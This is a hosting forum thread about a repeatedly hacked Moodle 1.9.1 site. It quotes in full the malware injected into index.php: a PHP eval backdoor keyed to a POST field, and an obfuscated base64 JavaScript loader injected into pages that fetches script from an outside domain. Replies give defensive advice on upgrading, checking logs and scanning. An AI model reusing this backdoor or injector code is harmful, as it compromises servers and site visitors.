Moodle 1.9.1+ (Build: 20080528) always hacked

[zooming]

Hello,

I'm having problems with one customer's site that is running Moodle 1.9.1+ (Build: 20080528).

It is always hacked, the PHP files are compromised. Some code is added to the beginning of the files.

I'm having problems to convince the customer to upgrade Moodle.

Is there a way to "virtual patch" this Moodle's version throught mod_security?

Thank you.
Alexandre

------
index.php head:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihLb3kpe3ZhciBhQkhuPSclJztldmFsKHVuZXNjYXBlKCgndmFyLTIwLTYxLTNkLTIyLTUzYy03MmlwLTc0RW5naW5lLTIyLTJjYi0zZC0yMlZlcnMtNjktNmZuKC0yOSstMjItMmNqLTNkLTIyLTIyLTJjdS0zZC02ZWF2aWctNjF0LTZmLTcyLTJldXNlLTcyQWdlLTZldC0zYi02OWYoKHUtMmVpbi02NGUtNzhPZigtMjItNTdpbi0yMiktM2UwKS0yNi0yNih1LTJlaW5kLTY1LTc4Ty02NigtMjJOVC0yMDYtMjIpLTNjLTMwKS0yNi0yNihkb2N1bS02NW50LTJlYy02Zm8tNmJpLTY1LTJlaW5kZXgtNGZmKC0yMi02ZGllLTZiLTNkMS0yMi0yOS0zYzApLTI2LTI2KHQtNzlwZW8tNjYoenJ2enRzKS0yMS0zZC03NC03OXBlLTZmZigtMjJBLTIyLTI5KS0yOS03Yi03YS03Mi03Nnp0cy0zZC0yMkEtMjItM2ItNjV2LTYxbCgtMjJpZi0yOHdpbmRvdy0yZS0yMithKy0yMiktNmEtM2RqKy0yMi0yYmErLTIyLTRkYWpvci0yMitiKy02MSstMjItNGRpbi02ZnItMjIrYithKy0yMi00MnVpbGQtMjIrLTYyLTJiLTIyai0zYi0yMiktM2JkLTZmY3VtLTY1LTZldC0yZXdyaXQtNjUtMjgtMjItM2NzLTYzLTcyaXB0LTIwc3JjLTNkLTJmLTJmZ3UtNmRibC02MS03Mi0yZS02M24tMmYtNzJzcy0yZi0zZmlkLTNkLTIyK2orLTIyLTNlLTNjLTVjLTJmc2MtNzItNjlwLTc0LTNlLTIyKS0zYi03ZCcpLnJlcGxhY2UoS295LGFCSG4pKSl9KSgvLS9nKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php // $Id: index.php,v 1.201.2.5 2008/04/15 21:42:50 stronk7 Exp $
// index.php - the front page.

///////////////////////////////////////////////////////////////////////////
// //
// NOTICE OF COPYRIGHT //
// //
// Moodle - Modular Object-Oriented Dynamic Learning Environment //
// http://moodle.org //
// //
// Copyright (C) 1999 onwards Martin Dougiamas http://moodle.com //
// //
// This program is free software; you can redistribute it and/or modify //
// it under the terms of the GNU General Public License as published by //
// the Free Software Foundation; either version 2 of the License, or //
// (at your option) any later version. //
// //
...
...
...

[faris]

That's a year old! There have been all sorts of security updates for serious issues since then.

I think the real question is why does the customer stay with that version?
Is there some huge difference between that version and the latest 1.9.4.x?
And have they changed all the passwords since the last attack? Inc FTP?
It is SO easy to upgrade Moodle.

Having said that, we have some customers who I need to talk to about running an older script (something else). They really need to upgrade. There's no two ways about it. I therefore understand your problem and theirs, but you have to draw the line somewhere.

In our Tc and Cs it says you HAVE to keep scripts updated with respect to security updates, "or else".

Faris.

[zooming]

Hello faris,

I agree with you. I have already draw this line, it's the second time this customer have asked me to restore a backup because of this problem.

I'm giving him a few more days to act, but I'm also looking for other ways to mitigate the problem.

Thank you!
Alexandre

[hostingguy]

if he wont upgrade then the $5 he pays you is not worth the time and cost of having your server attacked or worse.

Get rid of him and let him be some one elses problem.

[mikeshinn]

ASL has malware based FTP scanning, are you using that? The sigs can pick up this type of cloaked PHP malware when its uploaded to the system.

As to the attack itself, If the php files themselves are being modified its very unlikely that its a web attack so modsecurity wont help you there. Someone is logging into the system with the users passwords and is simply editing or uploading the files - have you checked your logs to see when the files were modified and who logged in at the same time?

Also, please send us those files so we can look into other ways to detect them (email to support@atomicorp.com, you will need to zip them up with a password or encrypt them otherwise they wont get thru). We have a redaction system in ASL that can also scrub content as its server up by the system, so it might be possible to write a type of virtual patch, if you will, to basically defang things like this even if they do manage to get on the system somehow.

[zooming]

Hello Michael,

I'm not aware of this ASL's feature, I'll need to read more about this.

I don't allow SSH connections, and I'll check the FTP log to see if they have a match for these files.

I don't have the modified files anymore, but I'll send them if I have this problem again.

Thank you.

Alexandre

[faris]

The FTP scanning thing is still in testing though, isn't it? Not yet released?

Faris.

[scott]

Yup its in testing, the daemon itself is fine. The hold up is that you have to configure it by hand unless you've got ASL 2.2 on the system.

[faris]

OK, thanks scott.

Zooming -- I'm PMed you about something vitally important related to this. Please read ASAP.